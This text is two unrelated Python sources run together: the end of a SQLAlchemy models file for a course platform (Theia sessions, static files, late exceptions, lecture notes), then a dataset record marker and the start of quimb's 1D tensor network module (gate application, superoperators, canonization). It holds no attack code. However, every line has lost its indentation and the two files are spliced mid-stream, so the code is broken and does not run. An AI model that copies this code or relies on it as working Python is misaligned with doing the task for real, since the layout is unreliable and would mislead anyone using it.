last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"stdout": self.stdout,
"passed": self.passed,
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
class TheiaSession(db.Model):
__tablename__ = "theia_session"
# id
id = default_id(32)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Foreign keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=False)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=True
)
repo_url = db.Column(db.String(128), nullable=True)
# Fields
active = db.Column(db.Boolean, default=True)
state = db.Column(db.TEXT)
cluster_address = db.Column(db.TEXT, nullable=True, default=None)
image = db.Column(db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6")
resources = db.Column(MutableJson, default=lambda: {})
network_policy = db.Column(db.String(128), default="os-student")
network_locked = db.Column(db.Boolean, default=True)
privileged = db.Column(db.Boolean, default=False)
autosave = db.Column(db.Boolean, default=True)
credentials = db.Column(db.Boolean, default=False)
persistent_storage = db.Column(db.Boolean, default=False)
k8s_requested = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
ended = db.Column(db.DateTime, nullable=True, default=None)
last_proxy = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.theia import theia_redirect_url
return {
"id": self.id,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name
if self.assignment_id is not None
else None,
"course_code": self.assignment.course.course_code
if self.assignment_id is not None
else None,
"netid": self.owner.netid,
"repo_url": self.repo_url,
"redirect_url": theia_redirect_url(self.id, self.owner.netid),
"active": self.active,
"state": self.state,
"created": str(self.created),
"ended": str(self.ended),
"last_proxy": str(self.last_proxy),
"last_updated": str(self.last_updated),
"autosave": self.autosave,
"persistent_storage": self.persistent_storage,
}
@property
def settings(self):
return {
"image": self.image,
"repo_url": self.repo_url,
"autosave": self.autosave,
"privileged": self.privileged,
"credentials": self.credentials,
"network_locked": self.network_locked,
"persistent_storage": self.persistent_storage,
}
class StaticFile(db.Model):
__tablename__ = "static_file"
id = default_id()
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Fields
filename = db.Column(db.TEXT)
path = db.Column(db.TEXT)
content_type = db.Column(db.TEXT)
blob = deferred(db.Column(db.LargeBinary(length=(2 ** 32) - 1)))
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="static_file"
)
@property
def data(self):
return {
"id": self.id,
"content_type": self.content_type,
"filename": self.filename,
"path": self.path,
"hidden": self.hidden,
"uploaded": str(self.created),
}
class LateException(db.Model):
__tablename__ = "late_exception"
user_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), primary_key=True
)
# New Due Date
due_date = db.Column(db.DateTime, nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"user_id": self.user_id,
"user_name": self.user.name,
"user_netid": self.user.netid,
"assignment_id": self.assignment_id,
"due_date": str(self.due_date),
}
class LectureNotes(db.Model):
__tablename__ = "lecture_notes"
id = default_id()
# Foreign keys
static_file_id = db.Column(
db.String(128), db.ForeignKey(StaticFile.id), nullable=False, index=True
)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Meta fields
post_time = db.Column(db.DateTime, nullable=True, default=datetime.now)
title = db.Column(db.TEXT, default="")
description = db.Column(db.TEXT, default="")
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"static_file": self.static_file.data,
"course": self.course.course_code,
"title": self.title,
"description": self.description,
"hidden": self.hidden,
"post_time": str(self.post_time),
"created": str(self.created),
"last_updated": str(self.last_updated),
}
|
the-stack_0_1691 | """Classes and algorithms related to 1D tensor networks.
"""
import re
import operator
import functools
from math import log2
from numbers import Integral
import scipy.sparse.linalg as spla
from autoray import do, dag, reshape, conj, get_dtype_name, transpose
from ..utils import (
check_opt, print_multi_line, ensure_dict, partition_all, deprecated
)
import quimb as qu
from .tensor_core import (
Tensor,
TensorNetwork,
rand_uuid,
bonds,
bonds_size,
oset,
tags_to_oset,
get_tags,
PTensor,
)
from .tensor_arbgeom import tensor_network_align, tensor_network_apply_op_vec
from ..linalg.base_linalg import norm_trace_dense
from . import array_ops as ops
align_TN_1D = deprecated(
tensor_network_align, 'align_TN_1D', 'tensor_network_align')
def expec_TN_1D(*tns, compress=None, eps=1e-15):
"""Compute the expectation of several 1D TNs, using transfer matrix
compression if any are periodic.
Parameters
----------
tns : sequence of TensorNetwork1D
The MPS and MPO to find expectation of. Should start and begin with
an MPS e.g. ``(MPS, MPO, ..., MPS)``.
compress : {None, False, True}, optional
Whether to perform transfer matrix compression on cyclic systems. If
set to ``None`` (the default), decide heuristically.
eps : float, optional
The accuracy of the transfer matrix compression.
Returns
-------
x : float
The expectation value.
"""
expec_tn = functools.reduce(operator.or_, tensor_network_align(*tns))
# if OBC or <= 0.0 specified use exact contraction
cyclic = any(tn.cyclic for tn in tns)
if not cyclic:
compress = False
n = expec_tn.L
isflat = all(isinstance(tn, TensorNetwork1DFlat) for tn in tns)
# work out whether to compress, could definitely be improved ...
if compress is None and isflat:
# compression only worth it for long, high bond dimension TNs.
total_bd = qu.prod(tn.bond_size(0, 1) for tn in tns)
compress = (n >= 100) and (total_bd >= 1000)
if compress:
expec_tn.replace_section_with_svd(1, n, eps=eps, inplace=True)
return expec_tn ^ all
return expec_tn ^ ...
_VALID_GATE_CONTRACT = {False, True, 'swap+split',
'split-gate', 'swap-split-gate', 'auto-split-gate'}
_VALID_GATE_PROPAGATE = {'sites', 'register', False, True}
_TWO_BODY_ONLY = _VALID_GATE_CONTRACT - {True, False}
def maybe_factor_gate_into_tensor(G, dp, ng, where):
# allow gate to be a matrix as long as it factorizes into tensor
shape_matches_2d = (ops.ndim(G) == 2) and (G.shape[1] == dp ** ng)
shape_matches_nd = all(d == dp for d in G.shape)
if shape_matches_2d:
G = ops.asarray(G)
if ng >= 2:
G = reshape(G, [dp] * 2 * ng)
elif not shape_matches_nd:
raise ValueError(
f"Gate with shape {G.shape} doesn't match sites {where}.")
return G
def gate_TN_1D(tn, G, where, contract=False, tags=None,
propagate_tags='sites', inplace=False,
cur_orthog=None, **compress_opts):
r"""Act with the gate ``g`` on sites ``where``, maintaining the outer
indices of the 1D tensor netowork::
contract=False contract=True
. . . . <- where
o-o-o-o-o-o-o o-o-o-GGG-o-o-o
| | | | | | | | | | / \ | | |
GGG
| |
contract='split-gate' contract='swap-split-gate'
. . . . <- where
o-o-o-o-o-o-o o-o-o-o-o-o-o
| | | | | | | | | | | | | |
G~G G~G
| | \ /
X
/ \
contract='swap+split'
. . <- where
o-o-o-G=G-o-o-o
| | | | | | | |
Note that the sites in ``where`` do not have to be contiguous. By default,
site tags will be propagated to the gate tensors, identifying a
'light cone'.
Parameters
----------
tn : TensorNetwork1DVector
The 1D vector-like tensor network, for example, and MPS.
G : array
A square array to act with on sites ``where``. It should have twice the
number of dimensions as the number of sites. The second half of these
will be contracted with the MPS, and the first half indexed with the
correct ``site_ind_id``. Sites are read left to right from the shape.
A two-dimensional array is permissible if each dimension factorizes
correctly.
where : int or sequence of int
Where the gate should act.
contract : {False, 'split-gate', 'swap-split-gate',
'auto-split-gate', True, 'swap+split'}, optional
Whether to contract the gate into the 1D tensor network. If,
- False: leave the gate uncontracted, the default
- 'split-gate': like False, but split the gate if it is two-site.
- 'swap-split-gate': like 'split-gate', but decompose the gate as
if a swap had first been applied
- 'auto-split-gate': automatically select between the above three
options, based on the rank of the gate.
- True: contract the gate into the tensor network, if the gate acts
on more than one site, this will produce an ever larger tensor.
- 'swap+split': Swap sites until they are adjacent, then contract
the gate and split the resulting tensor, then swap the sites back
to their original position. In this way an MPS structure can be
explicitly maintained at the cost of rising bond-dimension.
tags : str or sequence of str, optional
Tag the new gate tensor with these tags.
propagate_tags : {'sites', 'register', False, True}, optional
Add any tags from the sites to the new gate tensor (only matters if
``contract=False`` else tags are merged anyway):
- If ``'sites'``, then only propagate tags matching e.g. 'I{}' and
ignore all others. I.e. just propagate the lightcone.
- If ``'register'``, then only propagate tags matching the sites of
where this gate was actually applied. I.e. ignore the lightcone,
just keep track of which 'registers' the gate was applied to.
- If ``False``, propagate nothing.
- If ``True``, propagate all tags.
inplace, bool, optional
Perform the gate in place.
compress_opts
Supplied to :meth:`~quimb.tensor.tensor_core.Tensor.split`
if ``contract='swap+split'`` or
:meth:`~quimb.tensor.tensor_1d.MatrixProductState.gate_with_auto_swap`
if ``contract='swap+split'``.
Returns
-------
TensorNetwork1DVector
See Also
--------
MatrixProductState.gate_split
Examples
--------
>>> p = MPS_rand_state(3, 7)
>>> p.gate_(spin_operator('X'), where=1, tags=['GX'])
>>> p
<MatrixProductState(tensors=4, L=3, max_bond=7)>
>>> p.outer_inds()
('k0', 'k1', 'k2')
"""
check_opt('contract', contract, _VALID_GATE_CONTRACT)
check_opt('propagate_tags', propagate_tags, _VALID_GATE_PROPAGATE)
psi = tn if inplace else tn.copy()
if isinstance(where, Integral):
where = (where,)
ng = len(where) # number of sites the gate acts on
dp = psi.phys_dim(where[0])
tags = tags_to_oset(tags)
if (ng > 2) and contract in _TWO_BODY_ONLY:
raise ValueError(f"Can't use `contract='{contract}'` for >2 sites.")
G = maybe_factor_gate_into_tensor(G, dp, ng, where)
if contract == 'swap+split' and ng > 1:
psi.gate_with_auto_swap(G, where, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
return psi
bnds = [rand_uuid() for _ in range(ng)]
site_ix = [psi.site_ind(i) for i in where]
gate_ix = site_ix + bnds
psi.reindex_(dict(zip(site_ix, bnds)))
# get the sites that used to have the physical indices
site_tids = psi._get_tids_from_inds(bnds, which='any')
# convert the gate into a tensor - check if it is parametrized
if isinstance(G, ops.PArray):
if (ng >= 2) and (contract is not False):
raise ValueError(
"For a parametrized gate acting on more than one site "
"``contract`` must be false to preserve the array shape.")
TG = PTensor.from_parray(G, gate_ix, tags=tags, left_inds=bnds)
else:
TG = Tensor(G, gate_ix, tags=tags, left_inds=bnds)
# handle 'swap+split' only for ``ng == 1``
if contract in (True, 'swap+split'):
# pop the sites, contract, then re-add
pts = [psi._pop_tensor(tid) for tid in site_tids]
psi |= TG.contract(*pts)
return psi
# if not contracting the gate into the network, work out which tags to
# 'propagate' forward from the tensors being acted on to the gate tensors
if propagate_tags:
if propagate_tags == 'register':
old_tags = oset(map(psi.site_tag, where))
else:
old_tags = get_tags(psi.tensor_map[tid] for tid in site_tids)
if propagate_tags == 'sites':
# use regex to take tags only matching e.g. 'I0', 'I13'
rex = re.compile(psi.site_tag_id.format(r"\d+"))
old_tags = oset(filter(rex.match, old_tags))
TG.modify(tags=TG.tags | old_tags)
if ng == 1:
psi |= TG
return psi
# check if we should split multi-site gates (which may result in an easier
# tensor network to contract if we use compression)
if contract in ('split-gate', 'auto-split-gate'):
# | | | |
# GGG --> G~G
# | | | |
ts_gate_norm = TG.split(TG.inds[::2], get='tensors', **compress_opts)
# sometimes it is worth performing the decomposition *across* the gate,
# effectively introducing a SWAP
if contract in ('swap-split-gate', 'auto-split-gate'):
# \ /
# | | X
# GGG --> / \
# | | G~G
# | |
ts_gate_swap = TG.split(TG.inds[::3], get='tensors', **compress_opts)
# like 'split-gate' but check the rank for swapped indices also, and if no
# rank reduction, simply don't swap
if contract == 'auto-split-gate':
# | | \ /
# | | | | X | |
# GGG --> G~G or / \ or ... GGG
# | | | | G~G | |
# | | | |
norm_rank = bonds_size(*ts_gate_norm)
swap_rank = bonds_size(*ts_gate_swap)
if swap_rank < norm_rank:
contract = 'swap-split-gate'
elif norm_rank < dp**ng:
contract = 'split-gate'
else:
# else no rank reduction available - leave as ``contract=False``.
contract = False
if contract == 'swap-split-gate':
ts_gate = ts_gate_swap
elif contract == 'split-gate':
ts_gate = ts_gate_norm
else:
ts_gate = (TG,)
# if we are splitting the gate then only add site tags on the tensors
# directly 'above' the site
if contract in ('split-gate', 'swap-split-gate'):
if propagate_tags == 'register':
ts_gate[0].drop_tags(psi.site_tag(where[1]))
ts_gate[1].drop_tags(psi.site_tag(where[0]))
for t in ts_gate:
psi |= t
return psi
def superop_TN_1D(tn_super, tn_op,
upper_ind_id='k{}',
lower_ind_id='b{}',
so_outer_upper_ind_id=None,
so_inner_upper_ind_id=None,
so_inner_lower_ind_id=None,
so_outer_lower_ind_id=None):
r"""Take a tensor network superoperator and act with it on a
tensor network operator, maintaining the original upper and lower
indices of the operator::
outer_upper_ind_id upper_ind_id
| | | ... | | | | ... |
+----------+ +----------+
| tn_super +---+ | tn_super +---+
+----------+ | upper_ind_id +----------+ |
| | | ... | | | | | ... | | | | ... | |
inner_upper_ind_id| +-----------+ +-----------+ |
| + | tn_op | = | tn_op | |
inner_lower_ind_id| +-----------+ +-----------+ |
| | | ... | | | | | ... | | | | ... | |
+----------+ | lower_ind_id +----------+ |
| tn_super +---+ | tn_super +---+
+----------+ +----------+
| | | ... | <-- | | | ... |
outer_lower_ind_id lower_ind_id
Parameters
----------
tn_super : TensorNetwork
The superoperator in the form of a 1D-like tensor network.
tn_op : TensorNetwork
The operator to be acted on in the form of a 1D-like tensor network.
upper_ind_id : str, optional
Current id of the upper operator indices, e.g. usually ``'k{}'``.
lower_ind_id : str, optional
Current id of the lower operator indices, e.g. usually ``'b{}'``.
so_outer_upper_ind_id : str, optional
Current id of the superoperator's upper outer indices, these will be
reindexed to form the new effective operators upper indices.
so_inner_upper_ind_id : str, optional
Current id of the superoperator's upper inner indices, these will be
joined with those described by ``upper_ind_id``.
so_inner_lower_ind_id : str, optional
Current id of the superoperator's lower inner indices, these will be
joined with those described by ``lower_ind_id``.
so_outer_lower_ind_id : str, optional
Current id of the superoperator's lower outer indices, these will be
reindexed to form the new effective operators lower indices.
Returns
-------
KAK : TensorNetwork
The tensornetwork of the superoperator acting on the operator.
"""
n = tn_op.L
if so_outer_upper_ind_id is None:
so_outer_upper_ind_id = getattr(tn_super, 'outer_upper_ind_id', 'kn{}')
if so_inner_upper_ind_id is None:
so_inner_upper_ind_id = getattr(tn_super, 'inner_upper_ind_id', 'k{}')
if so_inner_lower_ind_id is None:
so_inner_lower_ind_id = getattr(tn_super, 'inner_lower_ind_id', 'b{}')
if so_outer_lower_ind_id is None:
so_outer_lower_ind_id = getattr(tn_super, 'outer_lower_ind_id', 'bn{}')
reindex_map = {}
for i in range(n):
upper_bnd = rand_uuid()
lower_bnd = rand_uuid()
reindex_map[upper_ind_id.format(i)] = upper_bnd
reindex_map[lower_ind_id.format(i)] = lower_bnd
reindex_map[so_inner_upper_ind_id.format(i)] = upper_bnd
reindex_map[so_inner_lower_ind_id.format(i)] = lower_bnd
reindex_map[so_outer_upper_ind_id.format(i)] = upper_ind_id.format(i)
reindex_map[so_outer_lower_ind_id.format(i)] = lower_ind_id.format(i)
return tn_super.reindex(reindex_map) & tn_op.reindex(reindex_map)
class TensorNetwork1D(TensorNetwork):
"""Base class for tensor networks with a one-dimensional structure.
"""
_NDIMS = 1
_EXTRA_PROPS = ('_site_tag_id', '_L')
_CONTRACT_STRUCTURED = True
def _compatible_1d(self, other):
"""Check whether ``self`` and ``other`` are compatible 2D tensor
networks such that they can remain a 2D tensor network when combined.
"""
return (
isinstance(other, TensorNetwork1D) and
all(getattr(self, e) == getattr(other, e)
for e in TensorNetwork1D._EXTRA_PROPS)
)
def __and__(self, other):
new = super().__and__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
def __or__(self, other):
new = super().__or__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
@property
def L(self):
"""The number of sites.
"""
return self._L
@property
def nsites(self):
"""The number of sites.
"""
return self._L
def gen_site_coos(self):
return tuple(i for i in range(self.L) if
self.site_tag(i) in self.tag_map)
@property
def site_tag_id(self):
"""The string specifier for tagging each site of this 1D TN.
"""
return self._site_tag_id
def site_tag(self, i):
"""The name of the tag specifiying the tensor at site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_tag_id.format(i)
def slice2sites(self, tag_slice):
"""Take a slice object, and work out its implied start, stop and step,
taking into account cyclic boundary conditions.
Examples
--------
Normal slicing:
>>> p = MPS_rand_state(10, bond_dim=7)
>>> p.slice2sites(slice(5))
(0, 1, 2, 3, 4)
>>> p.slice2sites(slice(4, 8))
(4, 5, 6, 7)
Slicing from end backwards:
>>> p.slice2sites(slice(..., -3, -1))
(9, 8)
Slicing round the end:
>>> p.slice2sites(slice(7, 12))
(7, 8, 9, 0, 1)
>>> p.slice2sites(slice(-3, 2))
(7, 8, 9, 0, 1)
If the start point is > end point (*before* modulo n), then step needs
to be negative to return anything.
"""
if tag_slice.start is None:
start = 0
elif tag_slice.start is ...:
if tag_slice.step == -1:
start = self.L - 1
else:
start = -1
else:
start = tag_slice.start
if tag_slice.stop in (..., None):
stop = self.L
else:
stop = tag_slice.stop
step = 1 if tag_slice.step is None else tag_slice.step
return tuple(s % self.L for s in range(start, stop, step))
def maybe_convert_coo(self, x):
"""Check if ``x`` is an integer and convert to the
corresponding site tag if so.
"""
if isinstance(x, Integral):
return (self.site_tag(x),)
if isinstance(x, slice):
return tuple(map(self.site_tag, self.slice2sites(x)))
return x
def _get_tids_from_tags(self, tags, which='all'):
"""This is the function that lets single integers be used for many
'tag' based functions.
"""
tags = self.maybe_convert_coo(tags)
return super()._get_tids_from_tags(tags, which=which)
def retag_sites(self, new_id, where=None, inplace=False):
"""Modify the site tags for all or some tensors in this 1D TN
(without changing the ``site_tag_id``).
"""
if where is None:
where = self.gen_site_coos()
return self.retag({self.site_tag(i): new_id.format(i) for i in where},
inplace=inplace)
@site_tag_id.setter
def site_tag_id(self, new_id):
if self._site_tag_id != new_id:
self.retag_sites(new_id, inplace=True)
self._site_tag_id = new_id
@property
def site_tags(self):
"""An ordered tuple of the actual site tags.
"""
return tuple(map(self.site_tag, self.gen_site_coos()))
@property
def sites(self):
return tuple(self.gen_site_coos())
@functools.wraps(tensor_network_align)
def align(self, *args, inplace=False, **kwargs):
return tensor_network_align(self, *args, inplace=inplace, **kwargs)
align_ = functools.partialmethod(align, inplace=True)
def contract_structured(
self,
tag_slice,
structure_bsz=5,
inplace=False,
**opts
):
"""Perform a structured contraction, translating ``tag_slice`` from a
``slice`` or `...` to a cumulative sequence of tags.
Parameters
----------
tag_slice : slice or ...
The range of sites, or `...` for all.
inplace : bool, optional
Whether to perform the contraction inplace.
Returns
-------
TensorNetwork, Tensor or scalar
The result of the contraction, still a ``TensorNetwork`` if the
contraction was only partial.
See Also
--------
contract, contract_tags, contract_cumulative
"""
# check for all sites
if tag_slice is ...:
# else slice over all sites
tag_slice = slice(0, self.L)
# filter sites by the slice, but also which sites are present at all
tags_seq = filter(self.tag_map.__contains__,
map(self.site_tag, self.slice2sites(tag_slice)))
# partition sites into `structure_bsz` groups
if structure_bsz > 1:
tags_seq = partition_all(structure_bsz, tags_seq)
# contract each block of sites cumulatively
return self.contract_cumulative(tags_seq, inplace=inplace, **opts)
def __repr__(self):
"""Insert length and max bond into standard print.
"""
s = super().__repr__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-2]}{extra}{s[-2:]}'
return s
def __str__(self):
"""Insert length and max bond into standard print.
"""
s = super().__str__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-1]}{extra}{s[-1:]}'
return s
class TensorNetwork1DVector(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which overall is like a vector with a single type of
site ind.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'_L',
)
def reindex_all(self, new_id, inplace=False):
"""Reindex all physical sites and change the ``site_ind_id``.
"""
tn = self if inplace else self.copy()
tn.site_ind_id = new_id
return tn
reindex_all_ = functools.partialmethod(reindex_all, inplace=True)
def reindex_sites(self, new_id, where=None, inplace=False):
"""Update the physical site index labels to a new string specifier.
Note that this doesn't change the stored id string with the TN.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
indices = self.gen_site_coos()
elif isinstance(where, slice):
indices = self.slice2sites(where)
else:
indices = where
return self.reindex({self.site_ind(i): new_id.format(i)
for i in indices}, inplace=inplace)
reindex_sites_ = functools.partialmethod(reindex_sites, inplace=True)
def _get_site_ind_id(self):
return self._site_ind_id
def _set_site_ind_id(self, new_id):
if self._site_ind_id != new_id:
self.reindex_sites_(new_id)
self._site_ind_id = new_id
site_ind_id = property(_get_site_ind_id, _set_site_ind_id,
doc="The string specifier for the physical indices")
def site_ind(self, i):
"""Get the physical index name of site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_ind_id.format(i)
@property
def site_inds(self):
"""An ordered tuple of the actual physical indices.
"""
return tuple(map(self.site_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense ket version of this 1D vector, i.e. a
``qarray`` with shape (-1, 1).
"""
if not inds_seq:
# just use list of site indices
return do('reshape', TensorNetwork.to_dense(
self, self.site_inds, **contract_opts
), (-1, 1))
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None):
if i is None:
i = next(iter(self.gen_site_coos()))
return self.ind_size(self.site_ind(i))
@functools.wraps(gate_TN_1D)
def gate(self, *args, inplace=False, **kwargs):
return gate_TN_1D(self, *args, inplace=inplace, **kwargs)
gate_ = functools.partialmethod(gate, inplace=True)
@functools.wraps(expec_TN_1D)
def expec(self, *args, **kwargs):
return expec_TN_1D(self, *args, **kwargs)
def correlation(self, A, i, j, B=None, **expec_opts):
"""Correlation of operator ``A`` between ``i`` and ``j``.
Parameters
----------
A : array
The operator to act with, can be multi site.
i : int or sequence of int
The first site(s).
j : int or sequence of int
The second site(s).
expec_opts
Supplied to :func:`~quimb.tensor.tensor_1d.expec_TN_1D`.
Returns
-------
C : float
The correlation ``<A(i)> + <A(j)> - <A(ij)>``.
Examples
--------
>>> ghz = (MPS_computational_state('0000') +
... MPS_computational_state('1111')) / 2**0.5
>>> ghz.correlation(pauli('Z'), 0, 1)
1.0
>>> ghz.correlation(pauli('Z'), 0, 1, B=pauli('X'))
0.0
"""
if B is None:
B = A
bra = self.H
pA = self.gate(A, i, contract=True)
cA = expec_TN_1D(bra, pA, **expec_opts)
pB = self.gate(B, j, contract=True)
cB = expec_TN_1D(bra, pB, **expec_opts)
pAB = pA.gate_(B, j, contract=True)
cAB = expec_TN_1D(bra, pAB, **expec_opts)
return cAB - cA * cB
class TensorNetwork1DOperator(TensorNetwork1D,
TensorNetwork):
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'_L',
)
def reindex_lower_sites(self, new_id, where=None, inplace=False):
"""Update the lower site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g.
``"ket{}"``.
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.lower_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_lower_sites_ = functools.partialmethod(
reindex_lower_sites, inplace=True)
def reindex_upper_sites(self, new_id, where=None, inplace=False):
"""Update the upper site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.upper_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_upper_sites_ = functools.partialmethod(
reindex_upper_sites, inplace=True)
def _get_lower_ind_id(self):
return self._lower_ind_id
def _set_lower_ind_id(self, new_id):
if new_id == self._upper_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._lower_ind_id != new_id:
self.reindex_lower_sites_(new_id)
self._lower_ind_id = new_id
lower_ind_id = property(
_get_lower_ind_id, _set_lower_ind_id,
doc="The string specifier for the lower phyiscal indices")
def lower_ind(self, i):
"""The name of the lower ('ket') index at site ``i``.
"""
return self.lower_ind_id.format(i)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def _get_upper_ind_id(self):
return self._upper_ind_id
def _set_upper_ind_id(self, new_id):
if new_id == self._lower_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._upper_ind_id != new_id:
self.reindex_upper_sites_(new_id)
self._upper_ind_id = new_id
upper_ind_id = property(_get_upper_ind_id, _set_upper_ind_id,
doc="The string specifier for the upper phyiscal "
"indices")
def upper_ind(self, i):
"""The name of the upper ('bra') index at site ``i``.
"""
return self.upper_ind_id.format(i)
@property
def upper_inds(self):
"""An ordered tuple of the actual upper physical indices.
"""
return tuple(map(self.upper_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense matrix version of this 1D operator, i.e. a
``qarray`` with shape (d, d).
"""
if not inds_seq:
inds_seq = (self.upper_inds, self.lower_inds)
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None, which='upper'):
"""Get a physical index size of this 1D operator.
"""
if i is None:
i = next(iter(self.gen_site_coos()))
if which == 'upper':
return self[i].ind_size(self.upper_ind(i))
if which == 'lower':
return self[i].ind_size(self.lower_ind(i))
def set_default_compress_mode(opts, cyclic=False):
opts.setdefault('cutoff_mode', 'rel' if cyclic else 'rsum2')
class TensorNetwork1DFlat(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which has a flat structure.
"""
_EXTRA_PROPS = ('_site_tag_id', '_L')
def _left_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i + 1]
rix, lix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
Q, R = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
R = R @ T2
Q.transpose_like_(T1)
R.transpose_like_(T2)
self[i].modify(data=Q.data)
self[i + 1].modify(data=R.data)
if bra is not None:
bra[i].modify(data=Q.data.conj())
bra[i + 1].modify(data=R.data.conj())
def _right_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i - 1]
lix, rix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
L, Q = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
L = T2 @ L
L.transpose_like_(T2)
Q.transpose_like_(T1)
self[i - 1].modify(data=L.data)
self[i].modify(data=Q.data)
if bra is not None:
bra[i - 1].modify(data=L.data.conj())
bra[i].modify(data=Q.data.conj())
def left_canonize_site(self, i, bra=None):
r"""Left canonize this TN's ith site, inplace::
i i
-o-o- ->-s-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i + 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._left_decomp_site(i, bra=bra, method='qr')
def right_canonize_site(self, i, bra=None):
r"""Right canonize this TN's ith site, inplace::
i i
-o-o- -s-<-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i - 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._right_decomp_site(i, bra=bra, method='lq')
def left_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Left canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
>->->->->->->-o-o- +-o-o-
| | | | | | | | | ... => | | | ...
>->->->->->->-o-o- +-o-o-
Parameters
----------
start : int, optional
If given, the site to start left canonizing at.
stop : int, optional
If given, the site to stop left canonizing at.
normalize : bool, optional
Whether to normalize the state, only works for OBC.
bra : MatrixProductState, optional
If supplied, simultaneously left canonize this MPS too, assuming it
to be the conjugate state.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_canonize_site(i, bra=bra)
if normalize:
factor = self[-1].norm()
self[-1] /= factor
if bra is not None:
bra[-1] /= factor
def right_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Right canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
-o-o-<-<-<-<-<-<-< -o-o-+
... | | | | | | | | | -> ... | | |
-o-o-<-<-<-<-<-<-< -o-o-+
Parameters
----------
start : int, optional
If given, the site to start right canonizing at.
stop : int, optional
If given, the site to stop right canonizing at.
normalize : bool, optional
Whether to normalize the state.
bra : MatrixProductState, optional
If supplied, simultaneously right canonize this MPS too, assuming
it to be the conjugate state.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_canonize_site(i, bra=bra)
if normalize:
factor = self[0].norm()
self[0] /= factor
if bra is not None:
bra[0] /= factor
